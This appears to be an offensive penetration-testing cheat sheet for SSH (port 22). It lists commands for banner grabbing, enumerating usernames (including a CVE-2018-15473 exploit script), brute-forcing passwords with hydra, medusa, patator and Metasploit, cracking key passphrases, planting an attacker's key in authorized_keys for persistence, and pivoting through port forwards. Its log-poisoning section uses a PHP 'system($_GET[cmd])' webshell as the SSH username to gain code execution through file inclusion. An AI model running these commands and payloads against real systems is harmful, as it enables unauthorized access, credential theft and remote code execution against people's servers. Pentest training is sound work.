22 - SSH
Information
Default Port: 22
PORT STATE SERVICE
22/tcp open ssh
Enumeration
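# Banner grab: the first line sshd sends (e.g. SSH-2.0-OpenSSH_8.9p1 Ubuntu-3) gives
# implementation, version and often the distro, which is what the CVE checks below key on.
nc -vn 192.168.1.2 22
# Same, but bounded. 0.1s is usually too short for a banner to arrive over a real
# network and silently prints nothing; give it a couple of seconds.
timeout 2 bash -c "nc -nv 192.168.1.2 22"
nmap -p22 -sS 192.168.1.2
# -sV version probe; -sC runs the default scripts, which include ssh-hostkey (host key
# fingerprints). Add --script ssh2-enum-algos,ssh-auth-methods for the offered KEX/cipher
# list and auth methods (useful before choosing a legacy KexAlgorithms workaround).
nmap -p22 -sVC 192.168.1.2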
Connect
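ssh user@192.168.1.2 # ip (default port)
ssh user@domain.tld # domain (default port)
ssh user@192.168.1.2 -p 1234 # other port
ssh -6 user@2a02:2e02:97c0:b500:1968:8cbb:002d:1809 # ipv6
ssh -X user@192.168.1.2 # X11 forwarding: the remote host gets access to your local X display, so only against hosts you trust
ssh user@192.168.1.2 -i id_rsa # private key (id_rsa); ssh refuses it unless mode is 600 (chmod 600 id_rsa)
ssh user@192.168.1.2 -t "bash --noprofile" # bypass restricted bash (rbash) set from profile scripts; --noprofile skips them
# Legacy 1024-bit DH group (weak); re-enable only against an old server that offers nothing
# better. Newer clients may additionally need -oHostKeyAlgorithms=+ssh-rsa
# -oPubkeyAcceptedAlgorithms=+ssh-rsa if the error is "no matching host key type found".
ssh user@192.168.1.2 -oKexAlgorithms=+diffie-hellman-group1-sha1 # error: no matching key exchange method found
# Values: yes / no / ask / accept-new. "no" skips host-key verification (no MITM detection)
# and still writes the key into ~/.ssh/known_hosts; add UserKnownHostsFile=/dev/null for
# throwaway targets so your known_hosts is not polluted with lab hosts.
ssh user@192.168.1.2 -o StrictHostKeyChecking=no # skip host key check
ssh user@192.168.1.2 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null # skip host key check, do not record the key
# apt install -y sshpass
# A password on the command line is visible to every local user via ps, and ends up in
# shell history and audit logs. Prefer -e (password in SSHPASS env var) or -f <file>.
sshpass -p 'Password123!' ssh root@192.168.1.2 # normal (password exposed in argv)
sshpass -p 'Password123!' ssh root@192.168.1.2 -o StrictHostKeyChecking=no # skip host key check
SSHPASS='Password123!' sshpass -e ssh root@192.168.1.2 # password via environment instead of argv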
# metasploit
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.2
set username peter
set password peterpan
exploit
sessions -l
sessions -i 1
User Enumeration
Brute Force
hydra -t 64 -L users.dic -p P@ssword1 ssh://192.168.1.2 -F -I
PasswordAuthentication
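#!/bin/bash
# Probe which usernames the target sshd offers password authentication to.
#
# Heuristic: ssh is started under `timeout`. When the server allows
# password/keyboard-interactive auth for the user, ssh blocks on the password
# prompt and is killed by timeout (exit 124). When only publickey is allowed
# for that user, ssh gives up at once with "Permission denied (publickey)"
# (exit 255). Any other exit code is reported as unexpected, not as a hit.
#
# Caveats:
#   - exit 255 also means "could not connect"; an unreachable host looks like
#     every user being denied. Confirm the port is open first (see Enumeration).
#   - a link slower than TIMEOUT turns a denied user into a false positive;
#     raise TIMEOUT (env var) when results look too good to be true.
#   - a hit means password auth is *offered* for that user, not that you are in.
#   - host-key checking is disabled and known_hosts is not written: fine for a
#     throwaway probe, but it removes MITM protection; do not copy these
#     options into real sessions.
set -u
trap ctrl_c INT
RED="\e[91m"
GREEN="\e[92m"
YELLOW="\e[93m"
BLUE="\e[34m"
WHITE="\e[97m"
USERS=$(<names.txt)            # candidate usernames, whitespace separated
RHOST="192.168.1.2"
RPORT="22"
TIMEOUT="${TIMEOUT:-0.5}"      # seconds to wait for a password prompt before giving up
function ctrl_c(){
echo
exit 1
}
for USER in ${USERS}; do
# PubkeyAuthentication=no keeps agent/default keys out of the probe, so the only
# way ssh can stall is on a password prompt.
timeout "${TIMEOUT}" ssh "${USER}@${RHOST}" -p "${RPORT}" \
  -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null \
  -o PubkeyAuthentication=no -o LogLevel=ERROR &>/dev/null
rc=$?
if [ "${rc}" -eq 124 ]; then
# killed by timeout: ssh was waiting for a password -> password auth is offered
echo -e "${BLUE}SSH ${WHITE}${RHOST}:${RPORT} ${GREEN}[+] ${WHITE}User ${GREEN}${USER} ${YELLOW}(Pwn3d!)"
exit
elif [ "${rc}" -eq 255 ]; then
# immediate refusal (publickey only) — or a connection error, see caveats
echo -e "${BLUE}SSH ${WHITE}${RHOST}:${RPORT} ${RED}[-] ${WHITE}User ${RED}${USER} ${WHITE}Permission denied (publickey)"
else
# anything else (local ssh error, unusual server) must not be counted as a hit
echo -e "${BLUE}SSH ${WHITE}${RHOST}:${RPORT} ${YELLOW}[?] ${WHITE}User ${YELLOW}${USER} ${WHITE}unexpected ssh exit code ${rc}"
fi
done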
id_rsa
Bash
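#!/bin/bash
# Try one private key against a list of usernames on a single host and report
# the first user for which `id` runs remotely.
#
# Options that matter for a correct result:
#   - IdentitiesOnly=yes: only ${KEY} is offered. Without it ssh also tries
#     ssh-agent and ~/.ssh default keys, so a hit could come from a different
#     key than the one under test.
#   - BatchMode=yes: no password/passphrase prompts. A passphrase-protected key
#     then fails immediately instead of hanging until TIMEOUT; decrypt it first
#     (see Cracking) or load it into ssh-agent and drop IdentitiesOnly.
#   - StrictHostKeyChecking=no + UserKnownHostsFile=/dev/null: an unknown host
#     key would otherwise block on the "are you sure" prompt and every user
#     would be reported as invalid. This removes MITM protection; probe only.
#   - TIMEOUT (env, default 5s): key exchange + auth + `id` on a real link
#     easily exceeds half a second, which produces false negatives.
#   - -x disables X11 forwarding for the probe.
set -u
trap ctrl_c INT
RED="\e[91m"
GREEN="\e[92m"
YELLOW="\e[93m"
BLUE="\e[34m"
WHITE="\e[97m"
USERS=$(<user.dic)             # candidate usernames, whitespace separated
KEY="id_rsa"
RHOST="192.168.1.2"
RPORT="22"
TIMEOUT="${TIMEOUT:-5}"
function ctrl_c(){
echo
exit 1
}
chmod 600 "${KEY}"             # ssh refuses a key that is group/world readable
for USER in ${USERS}; do
if timeout "${TIMEOUT}" ssh "${USER}@${RHOST}" -p "${RPORT}" -i "${KEY}" -x \
  -o IdentitiesOnly=yes -o BatchMode=yes \
  -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null \
  -o LogLevel=ERROR id &>/dev/null; then
# remote `id` returned 0 -> the key authenticates this user
echo -e "${BLUE}SSH ${WHITE}${RHOST}:${RPORT} ${GREEN}[+] ${WHITE}User ${GREEN}${USER} ${YELLOW}(Pwn3d!)"
exit
else
echo -e "${BLUE}SSH ${WHITE}${RHOST}:${RPORT} ${RED}[-] ${WHITE}User ${RED}${USER} ${WHITE}is invalid"
fi
done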
Metasploit
❯ msfconsole -q
msf6 > use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show OPTIONS
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 192.168.1.2
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set USER_FILE users.dic
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > run
CVE-2018-15473 (OpenSSH 2.3 through 7.7; fixed in 7.8) — username enumeration: the server's response to a malformed authentication packet differs for valid and invalid users. Confirm the banner version from the Enumeration step before relying on it.
https://github.com/Sait-Nuri/CVE-2018-15473
Manual
python3 CVE-2018-15473.py 192.168.1.2 -u root
[+] root is a valid username
python3 CVE-2018-15473.py 192.168.1.2 -u roott
[-] roott is an invalid username
Wordlist
# wordlist mode: one probe per name, so the 10M-name list is slow and noisy in auth.log;
# start with the small names.txt and filter the output down to the [+] hits
python3 CVE-2018-15473.py 192.168.1.2 -w /SecLists/Usernames/Names/names.txt
python3 CVE-2018-15473.py 192.168.1.2 -w /SecLists/Usernames/Names/names.txt | grep -v "invalid"
python3 CVE-2018-15473.py 192.168.1.2 -w /opt/SecLists/Usernames/xato-net-10-million-usernames.txt
python3 CVE-2018-15473.py 192.168.1.2 -w /opt/SecLists/Usernames/xato-net-10-million-usernames.txt | grep -v "invalid"
Password Brute Force
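# Keep parallelism low (-t 4): sshd's MaxStartups (default 10:30:100) drops surplus
# unauthenticated connections, so 64 tasks silently lose attempts and can miss the
# valid password. Check for account lockout and fail2ban-style rate limiting first;
# every attempt is logged in auth.log.
hydra -t 4 -l admin -P rockyou.txt ssh://192.168.1.2 -f -I # -f stop on first valid pair, -I ignore restore file
hydra -t 4 -l admin -P rockyou.txt ssh://192.168.1.2:65000 -f -I # non-default port
medusa -h 192.168.1.2 -u root -P rockyou.txt -M ssh -v 4 -f
medusa -h 192.168.1.2 -u root -P rockyou.txt -t 4 -M ssh -v 4 -f 2>/dev/null # -t threads per host, same MaxStartups caveat
medusa -h 192.168.1.2 -n 65000 -u one -P rockyou.txt -t 4 -M ssh -v 4 -f 2>/dev/null # -n non-default port
ncrack --user root -P rockyou.txt 192.168.1.2:22 -f
# patator needs a rule for what a failure looks like; tune the ignore rule to the banner
# text you actually see, otherwise every attempt is printed as a candidate
patator ssh_login user=user password=FILE0 0=rockyou.txt host=192.168.1.2 -x ignore:mesg='Authentication failed.'
patator ssh_login user=root password=FILE0 0=rockyou.txt host=192.168.1.2 -x ignore:code=1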
# metasploit
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.1.2
set USERNAME root
set PASS_FILE rockyou.txt
set VERBOSE true
run
Keys
Generate
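ssh-keygen # OpenSSH >= 9.5 defaults to ed25519, older releases to rsa; set a passphrase unless the key is for automation
ssh-keygen -t rsa # RSA explicitly; add -b 4096 for a larger modulus
# Append instead of `mv`: mv replaces authorized_keys and silently removes every key
# that was already authorized for root (and loses the .pub file).
mkdir -p /root/.ssh && chmod 700 /root/.ssh
cat /root/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys # sshd StrictModes rejects the file if it is group/world writable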
OpenSSL
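# -aes256 instead of -des3 for the key wrapper: 3DES is a legacy cipher. 2048 bits is the
# floor; prefer 3072 or more for anything long-lived.
openssl genrsa -aes256 -out private.pem 2048
# SPKI/PEM public key. This is NOT authorized_keys format, so sshd will not accept it as is.
openssl rsa -in private.pem -outform PEM -pubout -out public.pem
# Derive the single-line OpenSSH public key (authorized_keys format) from the PEM private key.
ssh-keygen -y -f private.pem > public.ssh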
puttygen
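cd ~/.ssh
puttygen -t rsa -o id_rsa -O private-openssh # OpenSSH-format private key from the puttygen CLI
# Append the public line rather than writing the file with -o, which would overwrite
# any keys already in authorized_keys. -L prints the public-openssh form to stdout.
puttygen -L id_rsa >> authorized_keys
chmod 600 id_rsa authorized_keys # required by ssh (key) and sshd StrictModes (authorized_keys)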
Import
ssh-copy
ssh-copy-id user@192.168.1.2
Cracking
JohnTheRipper
https://github.com/openwall/john
# extract a crackable hash from a passphrase-protected private key (ssh2john.py lives in john's run/ directory)
ssh2john.py id_rsa > hash
# wordlist attack on the passphrase
john --wordlist=rockyou.txt hash
# print the cracked passphrase from john's pot file
john --show hash
RSAcrack
https://github.com/d4t4s3c/RSAcrack
RSAcrack -w rockyou.txt -k id_rsa
Persistence
Attacker
❯ ssh-keygen
❯ cd .ssh
❯ ls -l
.rw------- root root 2.5 KB Tue Aug 22 08:50:33 2023 id_rsa
.rw-r--r-- root root 563 B Tue Aug 22 08:50:33 2023 id_rsa.pub
❯ cat id_rsa.pub |xclip -sel clip
Victim
user@victim:~$ mkdir -p ~/.ssh && chmod 700 ~/.ssh   # sshd (StrictModes) ignores the directory if it is group/world writable
user@victim:~/.ssh$ nano authorized_keys   # paste the id_rsa.pub line on its own line; append, do not replace existing entries
user@victim:~/.ssh$ chmod 600 authorized_keys
# Defender note: the new entry is plainly visible in authorized_keys and the key login in auth.log; check AuthorizedKeysFile in sshd_config if the default path is not honoured.
Attacker
❯ ssh user@192.168.1.2
Files
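/etc/ssh/sshd_config # server config: PermitRootLogin, PasswordAuthentication, PubkeyAuthentication, AllowUsers/AllowGroups, AuthorizedKeysFile, MaxStartups
/etc/ssh/sshd_config.d/*.conf # drop-in overrides included from sshd_config on newer distros; the effective value is the first one sshd reads
/var/log/auth.log # auth log (Debian/Ubuntu); RHEL-family uses /var/log/secure, systemd-only hosts `journalctl -u ssh` (or sshd)
~/.ssh/authorized_keys # per-user authorized public keys (persistence target, and the file to audit for unknown entries)
~/.ssh/known_hosts # hosts this user has connected to: pivoting hints (entries may be hashed, see HashKnownHosts)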
Log Poisoning
ssh '<?php system($_GET["cmd"]); ?>'@192.168.1.2 # the rejected username is written to auth.log as "Invalid user <?php ... from <ip>"; it must not match a real account or it is logged differently
http://192.168.1.2/file.php?file=/var/log/auth.log&cmd=id # only works if the LFI includes (executes) the file rather than just reading it, and if the web-server user can read auth.log — on Debian/Ubuntu it is 0640 root:adm, i.e. unreadable by www-data
Port Forwarding
Local
Attacker > Victim
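# Local forward: a port on the attacker box -> a host:port reachable from the victim.
# Binding 80 locally needs root; an unprivileged port (e.g. 8080:127.0.0.1:80) works the same.
# The listener binds to the attacker's loopback only, unless a bind address is given (-L 0.0.0.0:80:...).
ssh victim@192.168.1.2 -L 80:127.0.0.1:80 # port
ssh victim@192.168.1.2 -L 80:127.0.0.1:80 -L 81:127.0.0.1:81 # ports
ssh -N -f victim@192.168.1.2 -L 80:127.0.0.1:80 # forward only: -N no remote command, -f go to background
sshpass -p 'P@ssW0rd123' ssh victim@192.168.1.2 -L 80:127.0.0.1:80 # password (one liner; password visible in ps/history, prefer sshpass -e)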
Remote
Victim > Attacker
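# Remote forward: the victim logs in to the attacker and exposes one of its ports on the
# attacker's loopback. The victim gets a shell on your box, so use a throwaway, unprivileged
# account (or a key with command="" / restrict in authorized_keys), and remember your IP and
# the login land in the victim's known_hosts and shell history.
service ssh start # run service (attacker machine)
ssh kali@192.168.1.2 -R 80:127.0.0.1:80 # port: attacker 127.0.0.1:80 -> victim 127.0.0.1:80 (loopback only unless GatewayPorts is set in the attacker's sshd_config)
ssh kali@192.168.1.2 -R 80:127.0.0.1:80 -R 81:127.0.0.1:81 # ports
ssh -N kali@192.168.1.2 -R 80:127.0.0.1:80 # forward only, no shell on the attacker side
sshpass -p 'P@ssW0rd123' ssh kali@192.168.1.2 -R 80:127.0.0.1:80 # password (one liner; password visible in ps/history on the victim)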
Dynamic
Attacker > Victim
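ssh victim@192.168.1.2 -D 1080 # SOCKS proxy on attacker 127.0.0.1:1080; connections exit from the victim (add -N for proxy only)
# apt install -y proxychains4
# nano /etc/proxychains4.conf
# socks5 127.0.0.1 1080
# Only TCP connect() traffic traverses SOCKS: use -sT (connect scan) and -Pn (skip ICMP/ARP
# host discovery, which cannot go through the proxy). -sS, -sU and ping-based checks do not
# work here. The 127.0.0.1 target is resolved on the victim side, i.e. the victim's loopback.
proxychains -q nmap -sT -Pn -p- 127.0.0.1
proxychains -q curl http://127.0.0.1:80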
http://192.168.1.2/file.php?file=/var/log/auth.log&cmd=id